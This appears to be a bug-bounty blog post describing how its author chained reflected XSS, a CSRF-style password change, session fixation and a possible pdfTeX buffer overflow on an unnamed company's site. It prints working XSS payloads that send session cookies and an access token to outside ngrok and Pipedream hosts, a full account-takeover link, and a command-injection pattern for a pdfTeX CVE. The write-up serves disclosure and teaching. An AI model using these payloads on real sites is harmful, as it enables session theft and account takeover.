From XSS To CSRF | One-click Authorized Access To Account Takeover

Hey Guys, I’ll show you today my last finding in a company maybe going to be a tech unicorn very soon! The name of the company is obscure based on a policy of the company itself.

Chain 4 Vulnerabilities To Reach Maximum Impact Possible

1st — [Reflected XSS] -

XSS enables attackers to inject client-side scripts into HTML context viewed by other users. So I tried to execute a simple payload in the search box.

"><script>confirm('test')</script>

and it worked!

Honestly, I didn’t expect that. So I decided to dig more with a high confident that I would find more vulnerabilities. The impact of this vulnerability is very dangerous on the user. because of the ability to steal user cookies and access them again to the website. I used ngrok to make tunnels to my localhost and pass document.cookie value using HTTP request through XMLHttpRequest (XHR)

let’s remove spaces and make the code condensed quite a bit.

<script>x=new XMLHttpRequest();x.open('GET','https://764ec77e.ngrok.io/'+document.cookie);x.send();</script>

When we check ngrok dashboard. we got the user cookies in the request. you can notice the most important one user_access_token, we will mention it later.

We can add this cookies to the browser and send it to the website and login as a vicitm.

2nd — [Cross-Site Request Forgery] -

I intercept changing password request, Looking carefully, I noticed that JSON web token that we get from previous XSS (user_access_token) is used without CSRF token, So I was able to change the password and take over the account. Moreover, the API returns user information contains sensitive info like email. So the attacker can use it to login without any hassle.

Replace the JWT in Authorization header with the user_access_token leads to change the password on behalf of the user.

Level-Up!

I tried to chain XSS with CSRF to takeover the account and increase the impact of the vulnerabilities with a scenario I called it “Link2Hack” which needs a vicitm to click on the link to hijack the session cookies and change the password and retrieve the email’s vicitim in the response instantly.

To impelement this scenario I select the fastest way to make the POC using pipedream for creating webhook So we’re able to handle the response and make http request again to endpoint to change the password without manage a server. Also, Pipedream allows you to run javascript code with node.js enviroment!

let’s jump to the practical part.

1) Maintain your workflow

when you click on new workflow. you’ll get your workflow endpoint eg:-

https://entxk3uixmzvh5f.m.pipedream.net

add a new action to your workflow by clicking on the + button between any two steps.

I will choose the fastest way and select “Send HTTP Request”. it has one required parameter: the URL where you want to send the HTTP request. I’d like to change the HTTP method, add an HTTP payload, query string parameters or headers, I can click the add individual property. I change the method to ‘PATCH’ then set the headers which’s very important to make correct request.

Accept: application/vnd.api+json , Origin: https://redacted.net, Content-Type: application/vnd.api+json Authorization: Bearer

Now, We’re going to work on Authorization header and concatenate user_access_token value to ‘Bearer’ word since the application used JWT. I’ll pass this value through ‘c’ parameter through steps objects, for example:

https://entxk3uixmzvh5f.m.pipedream.net/?c=our_value_here

I can access properties of the HTTP request using event object

steps.trigger.event.

  • steps.trigger.event.body : A string or object representation of the HTTP payload
  • steps.trigger.event.client_ip : IP address of the client that made the request
  • steps.trigger.event.headers : HTTP headers, represented as an object
  • steps.trigger.event.method : HTTP method
  • steps.trigger.event.url : Request host + path
  • steps.trigger.event.query : URL Parameters

Accessing to ‘c’ parameter would be like that steps.trigger.event.query.c

Final step: add body of the request in payload parameter, which contains the password.

2) Get specific cookie value

since we got other values ( LiToken — ci_sessions — user_access_token) We need only user_access_token to make the request. for cutting this off from cookies I’ll use regex. replace() method searches a string for a specified value, or a regular expression, and returns a new string where the specified values are replaced.

replace(searchValue, replacer)

document.cookie.replace(/(?:(?:^|.*;\s*)user_access_token\s*\=\s*([^;]*).*$)|^.*$/, "$1")

So the final payload gonna be like this:

<script>var Cooki=document.cookie.replace(/(?:(?:^|.*;\s*)user_access_token\s*\=\s*([^;]*).*$)|^.*$/, "$1");x=new XMLHttpRequest();x.open('GET','https://entxk3uihmjvh5f.m.pipedream.net/?c='+Cooki,false);x.send();</script>

Well-done everything sets right. The full url:

https://redacted.com/?q=<script>var Cooki=document.cookie.replace(/(?:(?:^|.*;\s*)user_access_token\s*\=\s*([^;]*).*$)|^.*$/, "$1");x=new XMLHttpRequest();x.open('GET','https://entxk3uihmjvh5f.m.pipedream.net/?c='+Cooki,false);x.send();</script>

with URL-encoding will be ready to send. Once a user click on the link the javascript code will be executed and hijack the session cookies then change the password plus retrieve the email’s user in the response to signin.

3rd — [Session Fixation] -

Session Fixation is about authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier (SessionID) gives an attacker the opportunity to steal authenticated sessions or creates a new session on a web application and records the associated session identifier. Unfortunately, this’s what happened in this web app. After Changing the password the pervious SID still works. Which means the user continue using his account after the password has changed.

4th — Possible Buffer Overflow]-

The Company allows you to generate CV from your profile which will be created in PDF format. I generate a CV and download it. then I tried to extract pdf metadata using exiftool.

This is pdfTeX, Version 3.14159265–2.6–1.40.15 (TeX Live 2015/dev/Debian) kpathsea version 6.2.1dev. from TeX Users Group website:

This version is affected by Buffer Overflow [CVE-2018–17407] which was discovered in TeX Live before 2018–09–21. Briefly, We can use it to redirect the name of the glyph from the font file to serve as an argument to system().But what is the glyph? glyph is a graphical symbol which is used to represent a readabe character for the purposes of writing. using pdffonts to know fonts in our pdf:

Its contents are loaded into memory from reading entries like these from the .pfb file:

So the exploit as follows: dup 72 /COMMAND_HERE put for example

dup 72 /whoami put which execute the command with the permissions of the pdflatex process. Since this vulnerability wasn't in the web application, I wouldn't able to produce it. For further information you can see this awesome blog by Nick Roessler who discovered this vulnerability.

Thank you for reaching this point. Your feedback is highly appreciated twitter: @Psych0x02

InfoSec Student

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store